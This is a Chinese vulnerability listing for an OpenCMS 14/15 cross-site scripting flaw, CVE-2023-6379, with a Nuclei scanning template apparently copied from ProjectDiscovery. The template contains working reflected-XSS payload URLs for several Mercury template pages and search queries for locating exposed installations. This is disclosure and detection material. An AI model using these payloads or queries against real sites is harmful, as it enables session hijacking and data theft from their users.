漏洞信息
漏洞名称: OpenCMS 14 & 15 Cross Site Scripting Vulnerability
漏洞编号:
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: OpenCMS是由Alkacon Software开发的一款开源内容管理系统,广泛应用于企业和个人网站建设中,提供内容编辑、发布和管理功能。该系统的Mercury模板在14和15版本中存在跨站脚本(XSS)漏洞。此漏洞的根源在于对用户输入的不当处理,攻击者可以通过构造特定的URL参数注入恶意脚本代码。当其他用户访问包含恶意脚本的页面时,脚本将在用户的浏览器中执行,可能导致会话劫持、敏感信息泄露等安全问题。此漏洞的利用不需要用户认证,且可以通过网络自动触发,增加了其潜在的风险。虽然漏洞的严重性被评估为中等,但由于OpenCMS的广泛应用,其影响范围可能相当广泛。
产品厂商: Alkacon
产品名称: OpenCMS
影响版本: 14 <= version <= 15
搜索语法: title=”opencms”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fcves%2F2023%2FCVE-2023-6379.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92
| id: CVE-2023-6379
info: name: OpenCMS 14 & 15 - Cross Site Scripting author: msegoviag severity: medium description: | Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template. remediation: | Update to version OpenCMS 16 reference: - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379 - https://nvd.nist.gov/vuln/detail/CVE-2023-6379 - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms - https://github.com/fkie-cad/nvd-json-data-feeds - https://github.com/msegoviag/msegoviag classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-6379 cwe-id: CWE-79 epss-score: 0.18616 epss-percentile: 0.94993 cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 12 vendor: alkacon product: opencms shodan-query: - title:"opencms" - http.title:"opencms" - cpe:"cpe:2.3:a:alkacon:opencms" - /opencms/ fofa-query: title="opencms" google-query: intitle:"opencms" tags: cve2023,cve,opencms,xss,alkacon
flow: http(1) && http(2)
http: - method: GET path: - "{{BaseURL}}/"
matchers: - type: word words: - "OpenCms" - "opencms" condition: or internal: true
- method: GET - method: GET path: - "{{BaseURL}}{{paths}}" payloads: paths: - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1' - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"><script>alert(document.domain)</script>" />' - 'OpenCms' condition: and
- type: word part: content_type words: - "text/html"
- type: status status: - 200
|